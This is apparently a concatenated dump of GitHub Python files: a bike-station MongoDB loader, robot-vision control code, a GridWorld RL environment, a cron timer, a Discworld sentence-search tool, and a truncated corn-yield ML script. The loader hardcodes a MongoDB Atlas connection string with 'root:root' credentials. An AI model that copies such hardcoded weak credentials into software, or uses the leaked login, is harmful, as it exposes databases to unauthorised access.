vrennes\n]\n\nvlyon_to_insert = [\n {\n 'name': elem.get('fields', {}).get('name', ''),\n 'geometry': elem.get('geometry'),\n 'size': elem.get('fields', {}).get('bike_stand'),\n 'source': {\n 'dataset': 'Lyon',\n 'id_ext': int(elem.get('fields', {}).get('gid'))\n },\n 'tpe': elem.get('fields', {}).get('banking', '') == 't',\n 'available': elem.get('fields', {}).get('status', '') == 'OPEN'\n }\n for elem in vlyon\n]\n\nvparis_to_insert = [\n {\n 'name': elem.get('fields', {}).get('name', ''),\n 'geometry': elem.get('geometry'),\n 'size': elem.get('fields', {}).get('capacity'),\n 'source': {\n 'dataset': 'Paris',\n 'id_ext': int(elem.get('fields', 
{}).get('stationcode'))\n },\n 'tpe': False,\n 'available': elem.get('fields', {}).get('is_renting', '') == 'OUI'\n }\n for elem in vparis\n]\n\npprint(vlliles_to_insert)\npprint(vrennes_to_insert)\npprint(vlyon_to_insert)\npprint(vparis_to_insert)\n\natlas = MongoClient('mongodb+srv://root:root@cluster0.8wh7w.mongodb.net/bicycle?retryWrites=true&w=majority')\n\ndb = atlas.bicycle\ndb.stations.create_index([(\"geometry\", \"2dsphere\")])\ndb.stations.insert_many(vlliles_to_insert)\ndb.stations.insert_many(vrennes_to_insert)\ndb.stations.insert_many(vlyon_to_insert)\ndb.stations.insert_many(vparis_to_insert)\n\n# for vlille in vlliles_to_insert:\n#\tdb.stations.insert_one(vlille)\n","repo_name":"JJFrenoi/ISEN-MONGO","sub_path":"programme_1.py","file_name":"programme_1.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
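Because the script above creates a 2dsphere index on the GeoJSON "geometry" field, the collection supports geospatial queries once the inserts have run. A hedged sketch, with illustrative coordinates (longitude/latitude near Lille) and radius:

# Hedged sketch: five nearest open stations to a point, using the 2dsphere index.
nearest = db.stations.find(
    {
        "available": True,
        "geometry": {
            "$near": {
                "$geometry": {"type": "Point", "coordinates": [3.0573, 50.6292]},
                "$maxDistance": 1000,   # metres
            }
        },
    }
).limit(5)

for station in nearest:
    print(station["name"], station["source"]["dataset"])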
+{"seq_id":"23802300910","text":"#!/usr/bin/python2.7\r\n#\r\n# MAIN.PY IS AUTOMATICALLY STARTED ON REBOOT\r\n#\r\n\r\nimport cv2\r\nimport detect_object\r\nimport movement\r\nimport communication\r\nimport detect_aruco2\r\nimport numpy as np\r\nimport imutils\r\nimport time\r\n#from config import *\r\nimport config\r\nimport argparse\r\n\r\n#COLOR VALUES ARE MOVED TO CONFIG.PY, or more precisely into color_values.pkl,\r\n#which is written by hsv_range_detector.py\r\n\r\ncamera = cv2.VideoCapture(0)\r\n#camera.set(13, 0.40) #hue\r\n#camera.set(14, 0.04) #exposure\r\n\r\ncommunication.send_soon(\"init\")\r\n\r\n\r\nthrower_speed = 0\r\nlast_throw = time.time()\r\n\r\nblinds = cv2.imread('horseblinds.png', 0)\r\n\r\n\r\n'''Command line:\r\n Command line parameters are not saved anywhere, so use always when needed.\r\n Defaults are AA, off, blue.\r\n'''\r\nparser=argparse.ArgumentParser()\r\nparser.add_argument('--id', help='Field and robot: AA, AB, AC, BA...')\r\nparser.add_argument('--brakes', help='Emergency brake is on or not: on/off')\r\nparser.add_argument('--target', help='Where to throw: magenta or blue')\r\nparser.add_argument('--tambov', help='linear adjustment of throwing distance')\r\nargs=parser.parse_args()\r\n\r\nif not args.id is None:\r\n config.FIELD_ID = args.id[0]\r\n config.ROBOT_ID = args.id[1]\r\nif not args.brakes is None:\r\n config.BRAKES_ON = True if args.brakes=='on' else False\r\nif not args.target is None:\r\n config.TARGET_BASKET=args.target\r\n config.BASKET = config.MAGENTA_BASKET if args.target == 'magenta' else config.BLUE_BASKET\r\n\r\nif not args.tambov is None:\r\n detect_aruco2.TAMBOV = int(args.tambov)\r\nprint (detect_aruco2.TAMBOV)\r\n\r\n#print('PARAMS: FIELD=', FIELD_ID, ', ROBOT=', ROBOT_ID, ', BRAKES=', BRAKES_ON, ', TARGET=', TARGET_BASKET)\r\n#input()\r\n\r\nframestart = 0\r\ntry:\r\n while 1:\r\n\r\n (grabbed, frame) = camera.read()\r\n #print(\"grabbed = \",grabbed)\r\n frame = cv2.bitwise_and(frame, frame, mask = blinds)\r\n # resize the frame, blur it, and convert it to the HSV\r\n #frame = imutils.resize(frame, width=600)\r\n # blurred = cv2.GaussianBlur(frame, (11, 11), 0)\r\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\r\n\r\n ball_x1, ball_y1, ball_radius1, ball_center1, ball_mask = detect_object.find_ball(hsv, config.BALL_LOWER, config.BALL_UPPER)\r\n if ball_x1 >= 0:\r\n cv2.circle(frame, ball_center1, 10, (0, 0, 255), -1)\r\n cv2.imshow(\"mask\", ball_mask)\r\n\r\n basket_dist, basket_x, basket_corners, basket_ids = detect_aruco2.detect_basket(frame)\r\n basket_dist = detect_aruco2.gimme_running_average(basket_dist)\r\n\r\n amount_of_carpet = detect_object.percentage_of_color(hsv, config.CARPET_LOWER, config.CARPET_UPPER)\r\n\r\n\r\n communication.update_comms()\r\n print(\"ball_y = \", ball_y1)\r\n m1,m2,m3,thrower_speed = movement.get_command(ball_x1, ball_y1,ball_radius1, basket_x, basket_dist, amount_of_carpet)\r\n print(\"sent by the main: \",m1,m2,m3)\r\n\r\n communication.set_motors(m1,m2,m3)\r\n now = time.time()\r\n communication.update_comms()\r\n if thrower_speed > 0:\r\n communication.set_thrower(thrower_speed)\r\n last_throw = now\r\n elif (now - last_throw) >= 3:\r\n communication.set_thrower(0)\r\n communication.update_comms()\r\n\r\n\r\n\r\n cv2.putText(frame, \"CARPET: {}\".format(int(amount_of_carpet)),\r\n (50, 80), cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.5, (0, 0, 255), 1)\r\n\r\n fps = round(1.0 / (time.time() - framestart))\r\n cv2.putText(frame, \"FPS: {}\".format( fps ),\r\n (50, 100), cv2.FONT_HERSHEY_SIMPLEX,\r\n 
0.5, (0, 0, 255), 1)\r\n\r\n cv2.putText(frame, \"dx: {}, dy: {}, radius: {}\".format(int(ball_x1), int(ball_y1), int(ball_radius1)),\r\n (50, 50), cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.35, (0, 0, 255), 1)\r\n\r\n cv2.putText(frame, str( movement.activeState ),\r\n (10, 420), cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.45, (0, 0, 255), 1)\r\n\r\n cv2.line(frame, (320,100), (320,200), (0,0,255),1)\r\n\r\n cv2.imshow(\"Frame\", frame)\r\n framestart = time.time()\r\n\r\n\r\n key = cv2.waitKey(1) & 0xFF\r\n if key == ord(\"q\"):\r\n communication.send_now(\"sm:0:0:0\")\r\n communication.send_now(\"st:0\")\r\n break\r\n elif key == ord('b'):\r\n config.BRAKES_ON = not config.BRAKES_ON\r\n if config.BRAKES_ON:\r\n communication.send_now('sm:0:0:0')\r\n print (\"BRAKES!\")\r\n elif key == ord('p'): # take a screenshot\r\n cv2.imwrite('screenshot.png', frame)\r\n\r\n elif key == ord('w') and config.BRAKES_ON:\r\n communication.send_now('sm:-20:0:20')\r\n elif key == ord('s') and config.BRAKES_ON:\r\n communication.send_now('sm:20:0:-20')\r\n elif key == ord('a') and config.BRAKES_ON:\r\n communication.send_now('sm:-20:-20:-20')\r\n elif key == ord('d') and config.BRAKES_ON:\r\n communication.send_now('sm:20:20:20')\r\n\r\n elif key == 0xFF and config.BRAKES_ON:\r\n communication.send_soon('sm:0:0:0')\r\n\r\nexcept KeyboardInterrupt:\r\n communication.send_now(\"sm:0:0:0\")\r\n communication.send_now(\"st:0\")\r\n\r\ncamera.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"kadiraktass/robotex","sub_path":"software/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
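The main loop above relies on detect_object.find_ball(hsv, lower, upper) returning (x, y, radius, center, mask), but that module is not part of this record. The sketch below is an illustrative HSV-threshold-and-contour implementation with the same signature, not the robot's actual code.

# Hedged sketch of what detect_object.find_ball might look like.
import cv2

def find_ball(hsv, lower, upper):
    mask = cv2.inRange(hsv, lower, upper)
    mask = cv2.erode(mask, None, iterations=2)
    mask = cv2.dilate(mask, None, iterations=2)
    # [-2] picks the contour list in both OpenCV 3 and OpenCV 4 return formats.
    contours = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]
    if not contours:
        return -1, -1, 0, None, mask
    largest = max(contours, key=cv2.contourArea)
    (x, y), radius = cv2.minEnclosingCircle(largest)
    m = cv2.moments(largest)
    if m["m00"] > 0:
        center = (int(m["m10"] / m["m00"]), int(m["m01"] / m["m00"]))
    else:
        center = (int(x), int(y))
    return x, y, radius, center, mask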
+{"seq_id":"23374857220","text":"import numpy as np\n\nclass GridWorld:\n def __init__(self, grid_size=5, wind=0.2):\n # (0,0) bottom left corner (x,y)\n self.names = [\"Right\", \"Down\", \"Left\", \"Up\"]\n self.actions = [(1,0),(0,1),(-1,0),(0,-1)]\n self.n_actions = len(self.actions)\n self.n_states = grid_size**2\n self.wind = float(wind)\n \n self.grid_size = grid_size\n self.grid = np.zeros((grid_size, grid_size))\n\n self.features = np.eye(self.n_states)\n self.dynamics = self.transition_probabilities()\n self.real_rewards = np.array([self.reward(s) for s in range(self.n_states)])\n self.state = 0\n\n\n def reward(self, state_p):\n return 1 if state_p == self.n_states-1 else 0\n \n\n def reset(self, random=False):\n if random:\n self.state = np.random.randint(self.n_states)\n else:\n self.state = 0\n return self.state\n\n\n def step(self, a):\n probs = self.dynamics[:, a, self.state]\n self.state = np.random.choice(self.n_states, p=probs)\n return self.state\n\n\n def transition_probabilities(self):\n dynamics = np.zeros((self.n_states, self.n_actions, self.n_states))\n # S_t+1, A_t, S_t\n for s in range(self.n_states):\n x, y = s%self.grid_size, s//self.grid_size\n for a in range(self.n_actions):\n x_a, y_a = self.actions[a]\n for d in range(self.n_actions):\n x_d, y_d = self.actions[d]\n if 0 <= x+x_d < self.grid_size and 0 <= y+y_d < self.grid_size:\n dynamics[(x+x_d) + (y+y_d)*self.grid_size, a, s] += self.wind/self.n_actions\n else:\n dynamics[s, a, s] += self.wind/self.n_actions\n if 0 <= x+x_a < self.grid_size and 0 <= y+y_a < self.grid_size:\n dynamics[(x+x_a) + (y+y_a)*self.grid_size, a, s] += 1 - self.wind\n else:\n dynamics[s, a, s] += 1 - self.wind\n \n return dynamics\n\n \n def test(self):\n for s in range(self.n_states):\n print(\"/// State: \", s)\n for a in range(self.n_actions):\n print(\"/// Action: \", self.names[a])\n probs = self.dynamics[:, a, s]\n print(probs.reshape(-1, self.grid_size))\n\n\n def optimal_policy(self, state):\n x, y = state%self.grid_size, state//self.grid_size\n if x > y:\n return 1\n elif x < y:\n return 0\n else:\n return np.random.randint(2)\n\n\n def generate_trajectories(self, num, length, policy=None):\n if not policy:\n policy = self.optimal_policy\n\n trajs = []\n for n in range(num):\n t = []\n state = self.reset()\n for i in range(length):\n action = policy(state)\n state_p = self.step(action)\n t.append([state, action])\n state = state_p\n trajs.append(t)\n return np.array(trajs)","repo_name":"TroddenSpade/Maximum-Entropy-Deep-IRL","sub_path":"envs/GridWorld.py","file_name":"GridWorld.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"16"}
+{"seq_id":"20083184923","text":"# \n# cronned processes\n#\nimport time\nimport multiprocessing\nfrom threading import Thread, Event\nimport logging\nfrom file import DirectoryScanner, DiskScanner\n\ndef initCron(appContext):\n\tappContext.threads = []\n\n\tdirectoryScanner = DirectoryScanner(appContext )\n\tappContext.threads.append( RepeatingTimer( delay=30.0, target=directoryScanner.process ) )\n\n\tdiskScanner = DiskScanner(appContext)\n\tappContext.threads.append( RepeatingTimer( delay=30.0, target=diskScanner.process ) )\n\ndef startCron(appContext):\n\tfor thr in appContext.threads:\n\t\tthr.start()\n\nclass RepeatingTimer(Thread):\n\tdef __init__(self, delay=15, maxIterations=0, target=None):\n\t\tThread.__init__(self)\n\t\tself.daemon = True\n\t\tself.delay = delay\n\t\tself.target = target\n\t\tself.maxIterations = maxIterations\n\t\tself.finished = Event()\n\n\tdef run(self):\n\t\tcurrentIteration = 0\n\t\twhile not self.finished.isSet() and (self.maxIterations <= 0 or currentIteration < self.maxIterations):\n\t\t\tself.finished.wait( self.delay)\n\t\t\tif not self.finished.isSet():\n\t\t\t\tself.target()\n\t\t\t\tcurrentIteration += 1\n\n\tdef cancel(self):\n\t\tself.finished.set()\n","repo_name":"ickyfehmleh/hoarder","sub_path":"app/cron/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71018146249","text":"import pickle\nimport re\nfrom pathlib import Path\nfrom typing import Dict, List\n\nimport faiss\nimport numpy as np\nimport spacy\nimport wikipedia\nfrom loguru import logger\nfrom pydantic import BaseModel\nfrom sentence_transformers import SentenceTransformer\nfrom tqdm import tqdm\n\nfrom discworld_hex.book import Book, BookText\nfrom discworld_hex.sections import SECTIONS\n\nmodel = SentenceTransformer()\n\n\nclass Library(BaseModel):\n name: str\n books: List[Book] = []\n\n sentence_splitter_model: spacy.Language = None\n encoder_model: SentenceTransformer = None\n\n sentence_index: faiss.IndexFlatL2 = None\n sentence_index_to_book_text: Dict[int, BookText] = {}\n\n _plot_regex = re.compile(r\"(?:== (?:Plot|Synopsis)[^\\n]+$)\\s*(.+?)\\s*^== \", re.MULTILINE | re.S)\n\n class Config:\n arbitrary_types_allowed = True\n\n @classmethod\n def from_book_page_names(\n cls, name: str, book_page_names: List[str], sentence_splitter_model=None, encoder_model=None, limit: int = 0\n ):\n\n if limit > 0:\n book_page_names = book_page_names[:limit]\n\n logger.info(f\"Library {name} initialising from books with page names: {', '.join(book_page_names)}\")\n\n books = []\n for b in tqdm(book_page_names):\n book = Book.from_page(wikipedia.page(b, auto_suggest=False, redirect=False, preload=False))\n\n book.parse_plot()\n if not book.plot:\n logger.warning(f\"{book.name} has no plot, not adding it.\")\n continue\n\n book.parse_plot_paragraphs()\n book.parse_sentences(sentence_splitter_model)\n book.encode_sentences(encoder_model)\n books.append(book)\n\n if len(books) <= 0:\n raise ValueError(\"No books were added\")\n\n logger.success(\n f\"{len(books)} books loaded, parsed and encoded successfully: {', '.join(b.name for b in books)}\"\n )\n\n return Library(\n name=name,\n books=books,\n sentence_splitter_model=sentence_splitter_model,\n encoder_model=encoder_model,\n )\n\n def build_index(self):\n\n tensors = np.stack([book_sentences for book in self.books for book_sentences in book.plot_sentences_encoded])\n\n logger.info(f\"Building index from {tensors.shape[0]} sentences.\")\n\n tensor_id = 0\n for book in self.books:\n for sentence in book.plot_sentences:\n self.sentence_index_to_book_text[tensor_id] = BookText(book, sentence)\n tensor_id += 1\n\n index = faiss.IndexFlatL2(tensors.shape[1])\n index.add(tensors)\n\n assert index.is_trained\n\n logger.success(\n f\"Sentence index built, contains {tensors.shape[0]} sentences with {tensors.shape[1]} elements each.\"\n )\n self.sentence_index = index\n\n def save(self, path: Path = None):\n path = path or Path.home()\n path = path / f\"{self.name}.pkl\"\n\n logger.info(f\"Saving library to {path}\")\n with open(path, \"wb\") as f:\n pickle.dump(self, f, pickle.HIGHEST_PROTOCOL)\n logger.success(f\"Saved library to {path}\")\n\n @classmethod\n def load(cls, path: Path):\n logger.info(f\"Loading library from {path}\")\n\n with open(path, \"rb\") as f:\n library = pickle.load(f)\n\n logger.success(f\"Library {library.name} loaded!\")\n return library\n\n def search_interactive(self, k):\n logger.info(\n f\"Searching the {self.name} library interactively.\\n\"\n f\"Available books: {len(self.books)} – {', '.join(b.name for b in self.books)}\\n\"\n f\"Looking at {k} nearest neighbours.\"\n )\n\n while True:\n sentence = input(\"Input a sentence: \")\n\n sentence_encoded = self.encoder_model.encode(sentence)\n distances, indices = self.sentence_index.search(np.stack([sentence_encoded]), k)\n\n logger.debug(f\"distances: 
{distances}, indices: {indices}\")\n\n # we assume only one sentence query here:\n distances = distances[0]\n indices = indices[0]\n\n for rank in range(k):\n i = indices[rank]\n book, text = self.sentence_index_to_book_text[i]\n print(f\"{(rank + 1):>3}. {text}\")\n print(f\" – {book.name}, distance: {distances[rank]:.2f}\\n\")\n\n\ndef build_library(\n name: str = \"Discworld\",\n book_page_names: List[str] = SECTIONS[\"Discworld\"],\n sentence_splitter_model_name: str = \"en_core_web_sm\",\n encoder_model_name: str = \"all-mpnet-base-v2\",\n limit: int = 0,\n path: Path = None,\n):\n logger.info(f\"Loading sentence splitter model {sentence_splitter_model_name}\")\n sentence_splitter_model = spacy.load(sentence_splitter_model_name)\n\n logger.info(f\"Loading encoder model {encoder_model_name}\")\n encoder_model = SentenceTransformer(encoder_model_name)\n\n library = Library.from_book_page_names(\n name=name,\n book_page_names=book_page_names,\n sentence_splitter_model=sentence_splitter_model,\n encoder_model=encoder_model,\n limit=limit,\n )\n library.build_index()\n library.save(path=path)\n\n\ndef search_library(path: Path = Path.home() / \"Discworld.pkl\", k: int = 4):\n library = Library.load(path=path)\n\n library.search_interactive(k)\n\n\nif __name__ == \"__main__\":\n build_library()\n\n search_library()\n","repo_name":"MikulasZelinka/discworld-hex","sub_path":"src/discworld_hex/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":5430,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"1941098720","text":"\"\"\"\n@author: Mohsen\nML+APSIM for Corn Yield Prediction\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport random\nimport os\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder, MinMaxScaler\nfrom sklearn import linear_model\nfrom sklearn.linear_model import Lasso, ElasticNet, Ridge, LassoCV\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.neural_network import MLPRegressor\nfrom xgboost.sklearn import XGBRegressor\nfrom lightgbm import LGBMRegressor\nfrom scipy.optimize import minimize\nfrom sklearn.metrics import mean_squared_error as mse\nfrom sklearn.model_selection import cross_val_score, cross_val_predict, cross_validate, KFold\nfrom sklearn import metrics\nfrom sklearn.model_selection import RandomizedSearchCV, TimeSeriesSplit\nimport time\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.datasets import load_boston\nfrom sklearn.feature_selection import RFE\nimport warnings\nfrom scipy.io import loadmat\nfrom sklearn.model_selection import LeavePGroupsOut, GridSearchCV, GroupKFold\nfrom hyperopt import STATUS_OK\nfrom hyperopt import hp\nfrom hyperopt import tpe\nfrom hyperopt import Trials\nfrom hyperopt import fmin\nimport os\nfrom pathlib import Path\n\n\nwarnings.filterwarnings('ignore')\n\npd.set_option('display.max_columns', 500)\nnp.random.seed(1369)\npopulation = loadmat('INFO_POPULATION.mat')['INFO_POPULATION']\nprogress = loadmat('INFO_PROGRESS.mat')['INFO_PROGRESS']\nsoil = loadmat('INFO_SOIL.mat')['INFO_SOIL']\nYield = pd.DataFrame(loadmat('INFO_Yield.mat')['INFO_Yield'], columns =['year', 'state', 'county', 'yield'])\n\nweather = pd.read_parquet('main_weather_final.parquet')\nweather = weather[(weather.year >= 1984)&(weather.year <= 2018)]\nweather.state = weather.state.astype('int')\nweather.county = weather.county.astype('int')\nweather.year = weather.year.astype('int')\n\n# Constructing quarterly and cumulative weather features\nweather['prcp_Q2'] = weather.loc[:,'prcp_14':'prcp_26'].sum(axis=1)\nweather['prcp_Q3'] = weather.loc[:,'prcp_27':'prcp_39'].sum(axis=1)\nweather['prcp_Q4'] = weather.loc[:,'prcp_40':'prcp_52'].sum(axis=1)\nweather['prcp_Q1:Q2'] = weather.loc[:,'prcp_1':'prcp_26'].sum(axis=1)\nweather['prcp_Q1:Q3'] = weather.loc[:,'prcp_1':'prcp_39'].sum(axis=1)\nweather['prcp_Q1:Q4'] = weather.loc[:,'prcp_1':'prcp_52'].sum(axis=1)\n\nweather['tmax_Q2'] = weather.loc[:,'tmax_14':'tmax_26'].mean(axis=1)\nweather['tmax_Q3'] = weather.loc[:,'tmax_27':'tmax_39'].mean(axis=1)\nweather['tmax_Q4'] = weather.loc[:,'tmax_40':'tmax_52'].mean(axis=1)\nweather['tmax_Q1:Q2'] = weather.loc[:,'tmax_1':'tmax_26'].mean(axis=1)\nweather['tmax_Q1:Q3'] = weather.loc[:,'tmax_1':'tmax_39'].mean(axis=1)\nweather['tmax_Q1:Q4'] = weather.loc[:,'tmax_1':'tmax_52'].mean(axis=1)\n\nweather['tmin_Q2'] = weather.loc[:,'tmin_14':'tmin_26'].mean(axis=1)\nweather['tmin_Q3'] = weather.loc[:,'tmin_27':'tmin_39'].mean(axis=1)\nweather['tmin_Q4'] = weather.loc[:,'tmin_40':'tmin_52'].mean(axis=1)\nweather['tmin_Q1:Q2'] = weather.loc[:,'tmin_1':'tmin_26'].mean(axis=1)\nweather['tmin_Q1:Q3'] = weather.loc[:,'tmin_1':'tmin_39'].mean(axis=1)\nweather['tmin_Q1:Q4'] = weather.loc[:,'tmin_1':'tmin_52'].mean(axis=1)\n\nweather['gddf_Q2'] = weather.loc[:,'gddf_14':'gddf_26'].sum(axis=1)\nweather['gddf_Q3'] = 
weather.loc[:,'gddf_27':'gddf_39'].sum(axis=1)\nweather['gddf_Q4'] = weather.loc[:,'gddf_40':'gddf_52'].sum(axis=1)\nweather['gddf_Q1:Q2'] = weather.loc[:,'gddf_1':'gddf_26'].sum(axis=1)\nweather['gddf_Q1:Q3'] = weather.loc[:,'gddf_1':'gddf_39'].sum(axis=1)\nweather['gddf_Q1:Q4'] = weather.loc[:,'gddf_1':'gddf_52'].sum(axis=1)\n\nweather['srad_Q2'] = weather.loc[:,'srad_14':'srad_26'].sum(axis=1)\nweather['srad_Q3'] = weather.loc[:,'srad_27':'srad_39'].sum(axis=1)\nweather['srad_Q4'] = weather.loc[:,'srad_40':'srad_52'].sum(axis=1)\nweather['srad_Q1:Q2'] = weather.loc[:,'srad_1':'srad_26'].sum(axis=1)\nweather['srad_Q1:Q3'] = weather.loc[:,'srad_1':'srad_39'].sum(axis=1)\nweather['srad_Q1:Q4'] = weather.loc[:,'srad_1':'srad_52'].sum(axis=1)\n\n\n# Removing weather data after harvesting and before next planting date\nidx = list(['state', 'county', 'year']) + \\\n list(weather.loc[:,'prcp_16':'prcp_43'].columns) + \\\n list(weather.loc[:,'tmax_16':'tmax_43'].columns) + \\\n list(weather.loc[:,'tmin_16':'tmin_43'].columns) + \\\n list(weather.loc[:,'gddf_16':'gddf_43'].columns) + \\\n list(weather.loc[:,'srad_16':'srad_43'].columns) + \\\n list(weather.loc[:, 'prcp_Q2':])\nweather = weather[idx]\n\n\ncv = 10\n\n# Importing APSIM variables\ndata_d = pd.read_csv('data_all_apsim.csv', index_col=0)\n\n\n\n## ----------------- data preprocessing ----------------- ##\n\n\n# Feature construction (trend)\ndata_d['yield_trend'] = 0\nfor s in data_d.State.unique():\n for c in data_d[data_d.State==s].County.unique():\n y1 = pd.DataFrame(data_d.Yield[(data_d.Year<2018) & ((data_d.State).astype('int') == s) & ((data_d.County).astype('int') == c)])\n x1 = pd.DataFrame(data_d.Year[(data_d.Year<2018) & ((data_d.State).astype('int') == s) & ((data_d.County).astype('int') == c)])\n regressor = LinearRegression()\n regressor.fit(x1, y1)\n data_d.loc[(data_d.Year<2018)&(data_d.State==s)&(data_d.County==c),'yield_trend'] = regressor.predict(x1)\n if len(data_d.Year[(data_d.Year==2018)&(data_d.State==s)&(data_d.County==c)].unique()) != 0:\n data_d.loc[(data_d.Year==2018)&(data_d.State==s)&(data_d.County==c),'yield_trend'] = regressor.predict(pd.DataFrame([2018]))\n\n# Joining the APSIM, soil and progress variables together\ndata = pd.concat([data_d,pd.DataFrame(progress[:,12:25])], axis=1)\ndata = pd.concat([data,pd.DataFrame(soil)],axis=1)\n\n# dropping rows with na values (years before 1984)\ndata = data.dropna()\ndata = data.reset_index(drop=True)\n\n# renaming columns\nprogress_names = ['Progress_' + str(i) for i in range(1,14)]\nsoil_names = ['Soil_' + str(i) for i in range(1,181)]\nnames = [progress_names, soil_names]\nnames = [item for sublist in names for item in sublist]\ncol_names = data.columns.values\ncol_names[1:4] = ['year', 'state', 'county']\ncol_names[28:] = names\ndata.columns = col_names\n\n# Joining weather variables\ndata = pd.merge(data, weather , on=['year','state','county'])\n\n# Scaling the variables\ndata = data.rename(columns = {'year':'Year'})\ncolumns_to_scale = data.drop(columns=['Yield','Year','state','county']).columns.values\nscaler = MinMaxScaler()\nscaled_columns = scaler.fit_transform(data[columns_to_scale])\nscaled_columns = pd.DataFrame(scaled_columns, columns=columns_to_scale)\n\ndata2 = pd.DataFrame(data.Yield)\ndata = pd.concat([data2, data.Year, scaled_columns], axis=1)\n\n# Splitting the data set to test and train\ntest = data[data.Year==2018]\ntrain = data[data.Year!=2018]\n\nx_test = test.drop(columns=['Yield'])\ny_test = test.Yield\n\nX = 
train.drop(columns=['Yield'])\nX = X.reset_index(drop=True)\nY = train.Yield\nY.reset_index(inplace=True, drop=True)\n\n\n# feature selection with random forest\nrf = RandomForestRegressor(n_estimators=100)\nrf.fit(X, Y)\n\nfrom eli5.sklearn import PermutationImportance\n\nperm = PermutationImportance(rf, cv=cv, n_iter=10).fit(X, Y)\nfeature_importances = [(feature, importance) for feature, importance in zip(list(X.columns), list(np.abs(perm.feature_importances_)))]\nfeature_importances = pd.DataFrame(sorted(feature_importances, key = lambda x: x[1], reverse = True))\nselected_features = feature_importances.iloc[0:80,:][0]\nif np.isin('Year', selected_features)==False:\n selected_features = selected_features.append(pd.Series('Year'))\nX = X.loc[:,selected_features]\nx_test = x_test.loc[:,selected_features]\nselected_features.to_csv('RF_features_2018.csv')\n\n\n# CV\nkf = KFold(cv)\n\n\n\n ## ---------------- Bayesian Search ---------------- ##\n\n\nmax_evals = 20\n\ndef objective_LASSO(params):\n LASSO_df_B = pd.DataFrame()\n L1_B = Lasso()\n for train_index, test_index in kf.split(X):\n LASSO_B = L1_B.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n LASSO_df_B = pd.concat([LASSO_df_B, pd.DataFrame(LASSO_B.predict(np.array(X.drop(columns='Year'))[test_index]))])\n loss_LASSO = mse(data_d.Yield[(data_d.Year < 2018)], LASSO_df_B)\n return {'loss': loss_LASSO, 'params': params, 'status': STATUS_OK}\n\nspace_LASSO = {'alpha': hp.uniform('alpha', 10**-5, 1)}\ntpe_algorithm = tpe.suggest\ntrials_LASSO = Trials()\nbest_LASSO = fmin(fn=objective_LASSO, space=space_LASSO, algo=tpe.suggest,\n max_evals=max_evals, trials=trials_LASSO, rstate=np.random.RandomState(1369))\nLASSO_param_B = pd.DataFrame({'alpha': []})\nfor i in range(max_evals):\n LASSO_param_B.alpha[i] = trials_LASSO.results[i]['params']['alpha']\nLASSO_param_B = pd.DataFrame(LASSO_param_B.alpha)\n\n\n\ndef objective_XGB(params):\n XGB_df_B = pd.DataFrame()\n X1_B = XGBRegressor(objective='reg:squarederror', **params)\n for train_index, test_index in kf.split(X):\n XGB_B = X1_B.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n XGB_df_B = pd.concat([XGB_df_B, pd.DataFrame(X1_B.predict(np.array(X.drop(columns='Year'))[test_index]))])\n loss_XGB = mse(data_d.Yield[(data_d.Year < 2018)], XGB_df_B)\n return {'loss': loss_XGB, 'params': params, 'status': STATUS_OK}\n\nspace_XGB = {'gamma': hp.uniform('gamma', 0, 1),\n 'learning_rate': hp.uniform('learning_rate', 0.001, 0.5),\n 'n_estimators': hp.choice('n_estimators', [100, 300, 500, 1000]),\n 'max_depth': hp.choice('max_depth', [int(x) for x in np.arange(3, 20, 1)])}\ntpe_algorithm = tpe.suggest\ntrials_XGB = Trials()\nbest_XGB = fmin(fn=objective_XGB, space=space_XGB, algo=tpe.suggest,\n max_evals=max_evals, trials=trials_XGB, rstate=np.random.RandomState(1369))\nXGB_param_B = pd.DataFrame({'gamma': [], 'learning_rate': [], 'n_estimators': [], 'max_depth': []})\nfor i in range(max_evals):\n XGB_param_B.gamma[i] = trials_XGB.results[i]['params']['gamma']\n XGB_param_B.learning_rate[i] = trials_XGB.results[i]['params']['learning_rate']\n XGB_param_B.n_estimators[i] = trials_XGB.results[i]['params']['n_estimators']\n XGB_param_B.max_depth[i] = trials_XGB.results[i]['params']['max_depth']\nXGB_param_B = pd.DataFrame({'gamma': XGB_param_B.gamma,\n 'learning_rate': XGB_param_B.learning_rate,\n 'n_estimators': XGB_param_B.n_estimators,\n 'max_depth': XGB_param_B.max_depth})\n\n\ndef objective_LGB(params):\n LGB_df_B = pd.DataFrame()\n G1_B 
